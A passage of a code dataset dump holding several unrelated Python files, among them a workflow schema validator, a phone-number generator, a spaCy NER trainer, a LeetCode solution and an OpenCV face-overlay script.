self.coordinate_file_path = None\n\n self.statistics_file_path = None\n\n self.statistical_inefficiency = None\n\n def __getstate__(self):\n\n return_value = {\n 'substance': self.substance,\n 'trajectory_file_path': self.trajectory_file_path,\n 'coordinate_file_path': self.coordinate_file_path,\n 'statistics_file_path': self.statistics_file_path,\n 'statistical_inefficiency': self.statistical_inefficiency,\n }\n return return_value\n\n def __setstate__(self, state):\n\n self.substance = state['substance']\n self.trajectory_file_path = state['trajectory_file_path']\n self.coordinate_file_path = state['coordinate_file_path']\n self.statistics_file_path = state['statistics_file_path']\n self.statistical_inefficiency = state['statistical_inefficiency']\n\n\nclass WorkflowSchema(TypedBaseModel):\n \"\"\"Outlines the workflow which should be followed when calculating\n a certain property.\n \"\"\"\n\n def __init__(self,property_type=None):\n \"\"\"Constructs a new WorkflowSchema object.\n\n Parameters\n ----------\n property_type: str\n The type of property which this workflow aims to estimate.\n \"\"\"\n self.property_type = property_type\n self.id = None\n\n self.protocols = {}\n self.replicators = []\n\n self.final_value_source = None\n\n self.outputs_to_store = {}\n\n def __getstate__(self):\n\n return {\n 'property_type': self.property_type,\n 'id': self.id,\n\n 'protocols': self.protocols,\n 'replicators': self.replicators,\n\n 'final_value_source': self.final_value_source,\n\n 'outputs_to_store': self.outputs_to_store,\n }\n\n def __setstate__(self, state):\n\n self.property_type = state['property_type']\n self.id = state['id']\n\n self.protocols = state['protocols']\n self.replicators = state['replicators']\n\n self.final_value_source = state['final_value_source']\n\n self.outputs_to_store = state['outputs_to_store']\n\n def _validate_replicators(self):\n\n for replicator in self.replicators:\n\n assert replicator.id is not None and len(replicator.id) > 0\n\n if len(replicator.protocols_to_replicate) == 0:\n raise ValueError('A replicator does not have any protocols to replicate.')\n\n if (not isinstance(replicator.template_values, list) and\n not isinstance(replicator.template_values, ProtocolPath)):\n\n raise ValueError('The template values of a replicator must either be '\n 'a list of values, or a reference to a list of values.')\n\n if isinstance(replicator.template_values, list):\n\n for template_value in replicator.template_values:\n\n if not isinstance(template_value, ProtocolPath):\n continue\n\n if template_value.start_protocol not in self.protocols:\n raise ValueError('The value source {} does not exist.'.format(template_value))\n\n elif isinstance(replicator.template_values, ProtocolPath):\n\n if not replicator.template_values.is_global:\n raise ValueError('Template values must either be a constant, or come from the global '\n 'scope.')\n\n for protocol_path in replicator.protocols_to_replicate:\n\n if protocol_path.start_protocol not in self.protocols:\n raise ValueError('The value source {} does not exist.'.format(protocol_path))\n\n if protocol_path == self.final_value_source:\n\n raise ValueError('The final value source cannot come from'\n 'a protocol which is being replicated.')\n\n protocol_schema = self.protocols[protocol_path.start_protocol]\n\n if re.search(r'\\$\\(.*\\)', protocol_schema.id) is None:\n\n raise ValueError('Protocols which are being replicated must contain '\n 'the replicator id $(id) their protocol id.')\n\n def _validate_final_value(self):\n\n if self.final_value_source is None:\n raise ValueError('The final value source must not be None.')\n\n if self.final_value_source.start_protocol not in self.protocols:\n raise ValueError('The value source {} does not exist.'.format(self.final_value_source))\n\n protocol_schema = self.protocols[self.final_value_source.start_protocol]\n\n protocol_object = available_protocols[protocol_schema.type](protocol_schema.id)\n protocol_object.schema = protocol_schema\n\n protocol_object.get_value(self.final_value_source)\n\n attribute_type = protocol_object.get_attribute_type(self.final_value_source)\n assert issubclass(attribute_type, EstimatedQuantity)\n\n def _validate_outputs_to_store(self):\n \n attributes_to_check = [\n 'substance',\n 'trajectory_file_path',\n 'coordinate_file_path',\n 'statistics_file_path',\n 'statistical_inefficiency',\n ]\n\n for output_label in self.outputs_to_store:\n\n output_to_store = self.outputs_to_store[output_label]\n\n if not isinstance(output_to_store, WorkflowOutputToStore):\n\n raise ValueError('Only WorkflowOutputToStore objects are allowed '\n 'in the outputs_to_store dictionary at this time.')\n\n for attribute_name in attributes_to_check:\n\n attribute_value = getattr(output_to_store, attribute_name)\n\n if isinstance(attribute_value, ReplicatorValue):\n\n if len(self.replicators) == 0:\n\n raise ValueError('An output to store is trying to take its value from a '\n 'replicator, while this schema is no replicators.')\n\n elif len([replicator for replicator in self.replicators if\n attribute_value.replicator_id == replicator.id]) == 0:\n\n raise ValueError('An output to store is trying to take its value from a '\n 'replicator {} which does not exist.'.format(attribute_value.replicator_id))\n\n if not isinstance(attribute_value, ProtocolPath) or attribute_value.is_global:\n continue\n\n if attribute_value.start_protocol not in self.protocols:\n raise ValueError('The value source {} does not exist.'.format(attribute_value))\n\n protocol_schema = self.protocols[attribute_value.start_protocol]\n\n protocol_object = available_protocols[protocol_schema.type](protocol_schema.id)\n protocol_object.schema = protocol_schema\n\n protocol_object.get_value(attribute_value)\n\n def validate_interfaces(self):\n \"\"\"Validates the flow of the data between protocols, ensuring\n that inputs and outputs correctly match up.\n \"\"\"\n\n self._validate_final_value()\n self._validate_replicators()\n self._validate_outputs_to_store()\n\n for protocol_id in self.protocols:\n\n protocol_schema = self.protocols[protocol_id]\n\n protocol_object = available_protocols[protocol_schema.type](protocol_schema.id)\n protocol_object.schema = protocol_schema\n\n for input_path in protocol_object.required_inputs:\n\n input_value = protocol_object.get_value(input_path)\n\n if input_value is None:\n\n raise Exception('The {} required input of protocol {} in the {} schema was '\n 'not set.'.format(input_path, protocol_id, self.id))\n\n for input_path in protocol_object.required_inputs:\n\n value_references = protocol_object.get_value_references(input_path)\n\n for source_path, value_reference in value_references.items():\n\n if value_reference.is_global:\n # We handle global input validation separately\n continue\n\n # Make sure the other protocol whose output we are interested\n # in actually exists.\n if value_reference.start_protocol not in self.protocols:\n\n raise Exception('The {} protocol of the {} schema tries to take input from a non-existent '\n 'protocol: {}'.format(protocol_object.id, self.id,\n value_reference.start_protocol))\n\n other_protocol_schema = self.protocols[value_reference.start_protocol]\n\n other_protocol_object = available_protocols[other_protocol_schema.type](other_protocol_schema.id)\n other_protocol_object.schema = other_protocol_schema\n\n # Will throw the correct exception if missing.\n other_protocol_object.get_value(value_reference)\n\n expected_input_type = protocol_object.get_attribute_type(source_path)\n expected_output_type = other_protocol_object.get_attribute_type(value_reference)\n\n if (expected_input_type is not None and expected_output_type is not None and\n expected_input_type != expected_output_type):\n\n raise Exception('The output type ({}) of {} does not match the requested '\n 'input type ({}) of {}'.format(expected_output_type, value_reference,\n expected_input_type, source_path))\n","sub_path":"propertyestimator/workflow/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":14353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"132470955","text":"import re\nimport sys\n\ndef startProgram():\n sys.tracebacklimit = 0\n NPA = int(sys.argv[2])\n NXX = 200\n XXXX = 0000\n global phoneList\n global fileOption\n fileOption = sys.argv[1]\n if fileOption == 'file':\n phoneList = open(str(NPA)+'PhoneList', 'a+')\n numberCreation(NPA, NXX, XXXX)\n\ndef numberCreation(NPA, NXX, XXXX):\n while (NXX < 1000):\n number = str(NPA)+str(NXX)+str(XXXX).zfill(4)\n if fileOption == 'file':\n phoneList.write(number+'\\n')\n if fileOption == 'stream':\n print(number)\n\n XXXX += 1\n\n if XXXX == 10000:\n NXX += 1\n XXXX = 0000\n\n if re.match('[2-9][1][1]', str(NXX)) is not None:\n NXX += 1\n\n if NXX == 555 and XXXX == int ('0100'):\n XXXX = int('0200')\n\nstartProgram()\n\n# Wanted Changes\n# 1. Add Specific Area Code or All Area Code Options\n# 2. Fix Errors on Completion\n","sub_path":"numberGenerator.py","file_name":"numberGenerator.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"480841763","text":"import sys\nimport random\nimport os\nfrom pathlib import Path\nimport shutil\n\nimport argparse\nimport tqdm\nimport spacy\nfrom spacy.gold import minibatch\nfrom spacy.language import Language\nfrom spacy import util\n\n\nsys.path.insert(0, os.path.dirname(os.path.abspath(os.path.join(__file__, os.pardir))))\n\nfrom scispacy.data_util import read_full_med_mentions\nfrom scispacy.per_class_scorer import PerClassScorer\nfrom scispacy.umls_semantic_type_tree import construct_umls_tree_from_tsv\nfrom scispacy.train_utils import evaluate_ner\n\n\ndef train_ner(output_dir: str,\n data_path: str,\n run_test: bool = None,\n model: str = None,\n n_iter: int = 100,\n label_granularity: int = None):\n\n if label_granularity is not None:\n umls_tree = construct_umls_tree_from_tsv(\"https://s3-us-west-2.amazonaws.com/ai2-s2-scispacy/data/umls_semantic_type_tree.tsv\")\n label_mapping = umls_tree.get_collapsed_type_id_map_at_level(label_granularity)\n if label_granularity == 0:\n span_only = True\n else:\n label_mapping = None\n span_only = False\n train_data, dev_data, test_data = read_full_med_mentions(data_path, label_mapping, span_only)\n os.makedirs(output_dir, exist_ok=True)\n if run_test:\n nlp = spacy.load(model)\n print(\"Loaded model '%s'\" % model)\n evaluate_ner(nlp, dev_data, dump_path=os.path.join(output_dir, \"dev_metrics.json\"))\n evaluate_ner(nlp, test_data, dump_path=os.path.join(output_dir, \"test_metrics.json\"))\n else:\n train(model, train_data, dev_data, output_dir, n_iter)\n\n\ndef train(model, train_data, dev_data, output_dir, n_iter):\n \"\"\"Load the model, set up the pipeline and train the entity recognizer.\"\"\"\n if model is not None:\n nlp = spacy.load(model) # load existing spaCy model\n print(\"Loaded model '%s'\" % model)\n else:\n nlp = spacy.blank('en') # create blank Language class\n print(\"Created blank 'en' model\")\n\n # create the built-in pipeline components and add them to the pipeline\n # nlp.create_pipe works for built-ins that are registered with spaCy\n if 'ner' not in nlp.pipe_names and \"parser\" in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner, after=\"parser\")\n if 'ner' not in nlp.pipe_names and \"tagger\" in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner, after=\"tagger\")\n elif 'ner' not in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner, last=True)\n # otherwise, get it so we can add labels\n else:\n ner = nlp.get_pipe('ner')\n\n # add labels\n for _, annotations in train_data:\n for ent in annotations.get('entities'):\n ner.add_label(ent[2])\n\n # get names of other pipes to disable them during training\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner']\n\n dropout_rates = util.decaying(util.env_opt('dropout_from', 0.2),\n util.env_opt('dropout_to', 0.2),\n util.env_opt('dropout_decay', 0.005))\n batch_sizes = util.compounding(util.env_opt('batch_from', 1),\n util.env_opt('batch_to', 32),\n util.env_opt('batch_compound', 1.001))\n\n with nlp.disable_pipes(*other_pipes):\n optimizer = nlp.begin_training()\n\n best_epoch = 0\n best_f1 = 0\n for i in range(n_iter):\n\n random.shuffle(train_data)\n count = 0\n losses = {}\n total = len(train_data)\n\n with nlp.disable_pipes(*other_pipes): # only train NER\n with tqdm.tqdm(total=total, leave=True) as pbar:\n for batch in minibatch(train_data, size=batch_sizes):\n docs, golds = zip(*batch)\n nlp.update(docs, golds, sgd=optimizer,\n losses=losses, drop=next(dropout_rates))\n pbar.update(len(batch))\n if count % 100 == 0 and count > 0:\n print('sum loss: %s' % losses['ner'])\n count += 1\n\n # save model to output directory\n output_dir_path = Path(output_dir + \"/\" + str(i))\n if not output_dir_path.exists():\n output_dir_path.mkdir()\n\n with nlp.use_params(optimizer.averages):\n nlp.to_disk(output_dir_path)\n print(\"Saved model to\", output_dir_path)\n\n # test the saved model\n print(\"Loading from\", output_dir_path)\n nlp2 = util.load_model_from_path(output_dir_path)\n\n metrics = evaluate_ner(nlp2, dev_data)\n if metrics[\"f1-measure-untyped\"] > best_f1:\n best_f1 = metrics[\"f1-measure-untyped\"]\n best_epoch = i\n # save model to output directory\n best_model_path = Path(output_dir + \"/\" + \"best\")\n if os.path.exists(best_model_path):\n shutil.rmtree(best_model_path)\n shutil.copytree(os.path.join(output_dir, str(best_epoch)),\n best_model_path)\n\n # test the saved model\n print(\"Loading from\", best_model_path)\n nlp2 = util.load_model_from_path(best_model_path)\n\n evaluate_ner(nlp2, dev_data, dump_path=os.path.join(output_dir, \"metrics.json\"))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--model_output_dir',\n help=\"Path to the directory to output the trained models to\"\n )\n\n parser.add_argument(\n '--data_path',\n help=\"Path to the data directory.\"\n )\n\n parser.add_argument(\n '--run_test',\n help=\"Whether to run evaluation on the test dataset.\"\n )\n\n parser.add_argument(\n '--model_path',\n default=None,\n help=\"Path to the spacy model to load\"\n )\n parser.add_argument(\n '--iterations',\n type=int,\n help=\"Number of iterations to run.\"\n )\n parser.add_argument(\n '--label_granularity',\n type=int,\n help=\"granularity of the labels, between 1-7.\"\n )\n\n args = parser.parse_args()\n train_ner(args.model_output_dir,\n args.data_path,\n args.run_test,\n args.model_path,\n args.iterations,\n args.label_granularity)\n","sub_path":"scripts/train_ner.py","file_name":"train_ner.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"38959959","text":"from copy import copy\n\nfrom ...config import ARConfig\nfrom ...config import config as cfg\nfrom ...utils.utils import SUB_SCRIPTS\n\n\nclass Alpha:\n \"\"\"\n An Alpha represents a pure element of the algebra without magnitude.\n It is composed of 0-4 Dimensions with the number of dimensions determining\n its nature: i.e. scalar, vector, bivector, trivector, quadrivector\n \"\"\"\n\n def __init__(self, index: str, sign: int = 1, cfg: ARConfig = cfg):\n if sign not in [1, -1]:\n raise ValueError(\"Invalid α sign: {}\".format(sign))\n\n if index.startswith(\"-\"):\n index = index[1:]\n sign *= -1\n\n if index not in cfg.allowed + cfg.allowed_groups:\n raise ValueError(\"Invalid α index: {}\".format(index))\n\n self._index = index\n self._sign = sign\n self.allowed = cfg.allowed\n self.allowed_groups = cfg.allowed_groups\n\n @property\n def sign(self):\n return self._sign\n\n def __repr__(self):\n neg = \"-\" if self._sign == -1 else \"\"\n try:\n return \"{}α{}\".format(neg, \"\".join(SUB_SCRIPTS[i] for i in self._index))\n except KeyError:\n return \"{}α{}\".format(neg, self._index)\n\n def __tex__(self):\n neg = \"-\" if self.sign == -1 else \"\"\n return neg + \"\\\\alpha_{\" + self._index + \"}\"\n\n def __eq__(self, other):\n if not isinstance(other, Alpha):\n return False\n\n return all([(self._index == other._index), (self._sign == other._sign)])\n\n def __lt__(self, other):\n try:\n allowed = self.allowed + self.allowed_groups\n return allowed.index(self._index) < allowed.index(other._index)\n except ValueError:\n raise TypeError(\n f\"Inconsistant config detected:\\n{self} -> {self.cfg}\\n{other} -> {other.cfg}\"\n )\n\n def __neg__(self):\n neg = copy(self)\n neg._sign *= -1\n return neg\n\n def __hash__(self):\n return hash((self._index, self._sign))\n","sub_path":"arpy/algebra/data_types/alpha.py","file_name":"alpha.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"362741712","text":"#\n# Copyright (C) 2020 Sellers Industry - All Rights Reserved\n# Unauthorized copying of this file, via any medium is strictly\n# prohibited. Proprietary and confidential.\n#\n# author: Evan Sellers \n# date: Sat Oct 16 2020\n# file: preview.py\n# project: Sythetic Dataset Generator\n# purpose: Will take the output data from the generator and draw\n# bounding boxes around each object\n#\n#\n\nimport os\nimport xml.etree.ElementTree as ET\nimport xmltodict, json\nfrom PIL import Image, ImageFont, ImageDraw, ImageEnhance\n\ndirectory = os.path.join( os.getcwd(), \"output\" )\nimages_dir = os.path.join( directory, \"images\" )\nannotations_dir = os.path.join( directory, \"annotations\" )\noutput_dir = os.path.join( directory, \"preview\" )\noutlineColor = \"red\"\n\nfor annotation in os.listdir( annotations_dir ):\n file = json.loads( json.dumps( xmltodict.parse( ET.tostring( ET.parse( os.path.join( annotations_dir, annotation ) ).getroot() ) ) ) )[ \"annotation\" ]\n\n bbox = []\n source_img = Image.open( os.path.join( images_dir, file[ \"filename\" ] ) ).convert(\"RGB\")\n\n if isinstance( file[ \"object\" ], list ):\n bbox = file[ \"object\" ]\n else:\n bbox.append( file[ \"object\" ] )\n\n for bounding in range( 0, len( bbox ) ):\n draw = ImageDraw.Draw(source_img)\n draw.rectangle( ( int( bbox[ bounding ][ \"bndbox\" ][ \"xmin\" ] ), int( bbox[ bounding ][ \"bndbox\" ][ \"ymin\" ] ), int( bbox[ bounding ][ \"bndbox\" ][ \"xmax\" ] ), int( bbox[ bounding ][ \"bndbox\" ][ \"ymax\" ] ) ), outline=outlineColor, width=max( int( source_img.size[ 0 ] / 500 ), 1 ) )\n draw.text((int( bbox[ bounding ][ \"bndbox\" ][ \"xmin\" ] ), int( bbox[ bounding ][ \"bndbox\" ][ \"ymin\" ] )), bbox[ bounding ][ \"name\" ] )\n\n draw.text( ( 0, 0 ), \"Aris Defense Project - Synthetic Image Generator (Sellers Industry 2020)\" )\n source_img.save( os.path.join( output_dir, file[ \"filename\" ] ) )","sub_path":"preview.py","file_name":"preview.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"408780925","text":"\"\"\"\r\nmiddle 2022-01-04 同向双指针|滑动窗口\r\n(与567字符串的排列+76最小覆盖子串+438找到字符串中所有字母异位词相似)\r\nhttps://leetcode-cn.com/problems/permutation-in-string/solution/zi-fu-chuan-de-pai-lie-hua-dong-chuang-k-sos8/\r\n思路:\r\nflag:记录窗口中满足条件的字符个数\r\n若一个字符进入窗口,应该增加 window 计数器;若一个字符将移出窗口,应该减少 window 计数器;\r\n当 flag 满足 tMap 时应收缩窗口;收缩窗口的时候应该更新最终结果。\r\n当发现某个字符在 window 中的数量满足了 tMap 的需要,就要更新 flag,表示有一个字符已满足要求。\r\n当 right - left + 1 == t.length()时,窗口大小 \"等于\" 字符串 t 的长度时移动 left 缩小窗口,\r\n因为各种排列的长度显然应该是一样的。\r\n-----------------------------------------------------------------------------------\r\n# 窗口中可以有其他字符,但是 windowMap 中只存放当前窗口中与要找的字符串 t 中字符相等字符的出现次数\r\n# S = \"EBBANCF\",当窗口下标为 [0, 5] 时,windowMap = {A:1, B:2, C:1}\r\n# T = \"ABC\",其中 tMap = {A:1, B:1, C:1}\r\n\"\"\"\r\nfrom collections import Counter\r\nclass Solution:\r\n # 同LC76模板\r\n # s1是短的, s2是长的\r\n def checkInclusion(self, s1, s2):\r\n n, m = len(s2), len(s1)\r\n # window 记录窗口中的字符;tMap 记录需要凑齐的字符(need)\r\n window_map = {}\r\n t_map = Counter(s1)\r\n\r\n right, left = 0, 0\r\n flag = 0 # 记录窗口中满足条件的字符个数\r\n\r\n while right < n:\r\n # 如果当前字符在t_map中\r\n if s2[right] in t_map:\r\n # 就将该字符加入到window中,只记录在tmap中的字符\r\n window_map[s2[right]] = window_map.get(s2[right],0)+1\r\n # 如果这个字符和t_map中一样了,说明有一个字符满足要求了\r\n if window_map.get(s2[right],0) == t_map.get(s2[right],0):\r\n flag += 1\r\n # 寻找最优解\r\n # 窗口大小 \"等于\" 字符串 t 的长度时移动 left 缩小窗口\r\n while right-left+1 == m:\r\n # 收缩窗口的时候更新最终结果\r\n if flag==len(t_map): return True\r\n\r\n # 字符移除窗口\r\n if s2[left] in t_map:\r\n # 移出left时,如果是tmap中的元素,flag--\r\n if window_map.get(s2[left],0) == t_map.get(s2[left],0):\r\n flag -= 1\r\n # 当前窗口移除元素\r\n window_map[s2[left]] = window_map.get(s2[left],0)-1\r\n # 缩小窗口\r\n left += 1\r\n # 扩大窗口\r\n right += 1\r\n return False\r\n\r\n def check_ori(self,s1,s2):\r\n lens1, lens2 = len(s1), len(s2)\r\n if not s1 or not s2 or lens1 > lens2: return False\r\n\r\n needmap = Counter(s1)\r\n need_cnt = len(needmap) # 有多少个字母需要满足, {字母:字母个数}\r\n windowmap = {}\r\n\r\n i = 0\r\n for j in range(lens2):\r\n if s2[j] in needmap:\r\n windowmap[s2[j]] = windowmap.get(s2[j], 0) + 1 # 当前窗���只记录需要的字符\r\n if needmap.get(s2[j],0)==windowmap.get(s2[j],0): # 有一个字符满足条件了\r\n need_cnt-=1\r\n\r\n # 寻找最优解\r\n while j-i+1 == lens1:\r\n if need_cnt == 0: return True\r\n\r\n # 【这里】破坏窗口性质\r\n if s2[i] in needmap:\r\n if windowmap.get(s2[i],0)==needmap.get(s2[i],0):\r\n need_cnt+=1\r\n windowmap[s2[i]] = windowmap.get(s2[i],0)-1\r\n i+=1\r\n\r\n return False\r\n\r\nif __name__ == '__main__':\r\n # s1 = \"ab\"\r\n # s2 = \"eidbaooo\"\r\n s1 = \"ABC\"\r\n s2 = \"EBBACF\"\r\n myResult = Solution()\r\n # 第一个字符串的排列之一是第二个字符串的子串\r\n print(myResult.checkInclusion(s1, s2))","sub_path":"02_双指针/567-字符串的排列.py","file_name":"567-字符串的排列.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"601807845","text":"import os, time, datetime, sys\nimport pandas as pd\n#import gtts, vlc\nfrom num_cipher import encrypt\nimport shutil, subprocess\n#f = Figlet(font='big')\n\n# List of letters that Monica can't hear\n\ndef gen_banana(cols):\n banana = r'''\n _\n //\\\n V \\\n \\ \\_\n \\,'.`-.\n |\\ `. `. \n ( \\ `. `-. _,.-:\\\n \\ \\ `. `-._ __..--' ,-';/\n \\ `. `-. `-..___..---' _.--' ,'/\n `. `. `-._ __..--' ,' /\n `. `-_ ``--..'' _.-' ,'\n `-_ `-.___ __,--' ,'\n `-.__ `----\"\"\" __.-'\n `--..____..--'\n '''\n\n lines = banana.splitlines()\n banana = padRight(lines)\n banana = padToCenter(banana, cols)\n\n return banana\n\ndef padRight(l:list)->list:\n maxLength = max(len(x) for x in l)\n return [ x.ljust(maxLength) for x in l]\n\ndef padToCenter(l:list,w:int)->str:\n \"\"\"Manual centering\"\"\"\n padding = ' '*(w//2) # a 1 char line would need at most w/2 spaces in front\n parts = [ padding[0: (w-len(p))//2+1]+p for p in l]\n return '\\n'.join(parts)\n\ndef padToCenter2(l:list,w:int)->str:\n return '\\n'.join('-'+x.center(w)+'-' for x in l)\n\ndef monify(user_text):\n\n\t'''\n\targs:\n\t\tuser_text: string that is inputted by user\n\t\tcant_hear: list of letters that cant be heard\n\n\tThis function turns the string into a list, iterates through the list \n\tand removes any character that monica cant hear and replaces it with a space\n\tthen joins the list and returns a string\n\t'''\n\tcant_hear = ['s','t','h','c','k','f','g','p',\n\t\t'S','T','H','C','K','F','G','P']\n\n\ttext_list = [i for i in user_text]\n\tnew_list = []\n\tfor i in text_list:\n\t\tif i in cant_hear:\n\t\t\tnew_list.append(' ')\n\t\telse:\n\t\t\tnew_list.append(i)\t\n\treturn \"\".join(new_list)\n\ndef get_time():\n\n\t'''\n\tFunction that just returns the datetime in a nice format for saving\n\t'''\n\n\tdate = str(datetime.datetime.now()).split(' ')[0]\n\ttime = '_'.join(str(datetime.datetime.now()).split(' ')[1][:5].split(':'))\n\n\treturn '{}_{}'.format(date,time)\n\ndef update_data(new_time, new_monified, encrypted, path='data/speech_banana.csv'):\n\n\t'''\n\t\targs:\n\t\t\tnew_time: timestamp from when user used program\n\t\t\tnew_monified: monified input\n\t\t\tpath: path to the csv file where text is saved - no need to change\n\n\tThis function updates the data file, and if the file doesn't exist it creates a new one\n\t'''\n\n\ttry:\n\t\tdf = pd.read_csv(path)\n\t\t\n\texcept:\n\t\tdf = pd.DataFrame(data={'text' : [], 'timestamp' : []})\n\n\tnew_row = pd.Series(data={'text' : new_monified, 'timestamp' : new_time ,'ecnrypted_input' : encrypted}, name='x')\n\tnew_df = df.append(new_row, ignore_index=False)\n\tnew_df.to_csv('data/speech_banana.csv', index=False)\n\ndef make_sexy(text, cols, height):\n\t'''\n\targs: \n\t\ttext: the monified text\n\t\t\n\tjust prints the text\n\n\t'''\n\tprint(text.center(cols))\n\t\n\tfor i in range(7):\n\t\tprint('.'.center(cols))\n\n\t\ttime.sleep(1.2)\n\ttime.sleep(1.5)\n\ndef main():\n\tcols, rows, = get_dims()\n\t\n\t\n\tos.system(\"xinput list\")\n\tkey_num = input(\"What is the keyboard's number, xinput list then look for the keyboard id: \")\n\tbanana = gen_banana(cols)\n\t\n\ti =1\n\t\n\twhile i != 2: # creating infinite loop \n\t\tprint(\"\\n\" * 7)\n\t\tprint(banana)\n\n\t\tsubprocess.run('xinput set-prop {} \"Device Enabled\" 1'.format(str(key_num)), shell=True, check=True)\n\t\tprint('\\n'*3)\n\t\ttext = 'Type your sentence below!'\n\t\tprint('{}Hello!\\n{}Do you want to see how I hear?'.format(' '*(int(cols/2-(6 /2))), ' '*(int(cols/2-(29 /2)))))\t\t\n\t\tuser_input = input('{}{}\\n\\n\\n{}'.format(' '*(int(cols/2- (len(text)/ 2))), text,' '*(int(cols/4))).center(int(cols/4)))\n\t\tif user_input == 'quit this fucker':\n\t\t\texit(0)\n\t\t#print(user_input.center(cols))\n\t\tsubprocess.run('xinput set-prop {} \"Device Enabled\" 0'.format(str(key_num)), shell=True, check=True)\n\t\tn = 0\n\n\t\t# loop to make time look like a robot\n\t\twhile n != 5: #number = seconds\n\t\t\tprint(\".\".center(cols))\n\t\t\ttime.sleep(1.2)\n\t\t\tn += 1\n\n\t\tprint(\"\\n\")\n\t\ttimestamp = get_time()#yyyy-mm-dd_mm-ss\n\t\t#audio_path = 'data/audio/{}.mp3'.format(timestamp)\n\n\t\tmonified = monify(user_input)\n\t\t#monified_audio = gtts.gTTS(monified)\n\t\t#monified_audio.save(audio_path)\n\t\t#p = vlc.MediaPlayer(audio_path)\n\t\t#p.play()\n\t\tmake_sexy(monified, cols,rows)\n\t\ttry:\n\t\t\tencrypted_input = encrypt(user_input)\n\t\texcept:\n\t\t\tencrypted_input = 'encryption failed'\n\t\tupdate_data(timestamp, monified, encrypted_input)\n\t\tos.system('clear') #clears screen\n\ndef get_dims():\n\n\tcols, rows = shutil.get_terminal_size()\n\treturn cols, rows\n\nif __name__ == '__main__':\n\t\n\twhile 1 != 2:\n\t\ttry:\n\t\t\n\t\t\tmain()\n\t\texcept KeyboardInterrupt:\n\t\t\tcontinue\n\t\n","sub_path":"run_backup.py","file_name":"run_backup.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"544880093","text":"from . import db\n\n\nclass Books(db.Model):\n __tablename__ = 'books'\n book_id = db.Column(db.Integer, primary_key=True)\n link = db.Column(db.String(150), nullable=False, unique=True)\n title = db.Column(db.String(255), nullable=False)\n page_quantity = db.Column(db.String(11), nullable=True)\n lang = db.Column(db.String(25), nullable=False)\n author = db.Column(db.String(80), nullable=False, index=True)\n genre = db.Column(db.String(80), nullable=False)\n\n def __repr__(self):\n return '' % self.title\n\n @property\n def serialize(self):\n return {\n 'id': self.book_id,\n 'link': self.link,\n 'title': self.title,\n 'page_quantity': self.page_quantity,\n 'lang': self.lang,\n 'author': self.author,\n 'genre': self.genre\n }\n\n @staticmethod\n def get_or_create_db_entry(books_dict):\n for id, data in books_dict.items():\n if db.session.query(Books.book_id).filter_by(book_id=int(id)).scalar():\n print('есть в бд')\n else:\n vars()[data['instance_name']] = Books(book_id=int(id), link=books_dict[id]['link'],\n title=books_dict[id]['title'],\n page_quantity=str(books_dict[id]['page_quantity']),\n lang=books_dict[id]['lang'],\n author=books_dict[id]['author'], genre=books_dict[id]['genre'])\n db.session.add(eval(data['instance_name']))\n print('добавлено в бд')\n","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"252121870","text":"import numpy as np\nimport cv2 # pip install opencv-python\nimport math\n\n\n#https://github.com/Itseez/opencv/blob/master/data/haarcascades/haarcascade_frontalface_default.xml\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n#https://github.com/Itseez/opencv/blob/master/data/haarcascades/haarcascade_eye.xml\n\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\n\nimage = cv2.imread('glasses.png',cv2.IMREAD_COLOR)\n\nrow, col , channels = image.shape\n\ncap = cv2.VideoCapture(0) \n\nflag = 0\n\neyes=[]\n\nwhile 1:\n ret, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n \n for (x,y,w,h) in faces: ## we only look for eyes inside faces\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n \n eyes = eye_cascade.detectMultiScale(roi_gray)\n\n \n \n \n\n if (len(eyes) == 2): ## if two eyes are found... sometimes objects are misidentified as eyes, and sometimes eyes are not identified \n\n flag = 1\n\n fx = eyes[0,0]+eyes[1,0] \n fx= int(fx/2 + x)\n fy = eyes[0,1]+eyes[1,1] \n fy= int(fy/2 + y)\n\n dis = abs(eyes[0,0]-eyes[1,0])\n print(fx,' ',fy,' ',dis)\n\n \n dis_default = 65 # default distance for the scale of glasses\n dx = 50 # rows offset\n dy = 20 # columns offset\n \n\n\n ratio = dis/dis_default\n\n dx = int(dx*ratio) # shifting offsets to distance\n dy = int(dy*ratio)\n\n size = (int(col*ratio) , int(row*ratio) )\n\n print(ratio,' ',size)\n\n img3 = cv2.resize(image,size) \n\n rows, cols , channels = img3.shape\n\n\n \n\n img3gray = cv2.cvtColor(img3, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(img3gray, 10, 255, cv2.THRESH_BINARY)\n mask_inv = cv2.bitwise_not(mask)\n\n\n if flag == 1: # flag is used to wiat for initial position of glasses to be set\n roi = img[fy+0-dy:fy+rows-dy,fx+0-dx:fx+cols-dx] \n img1_bg = cv2.bitwise_and(roi,roi,mask = mask_inv)\n 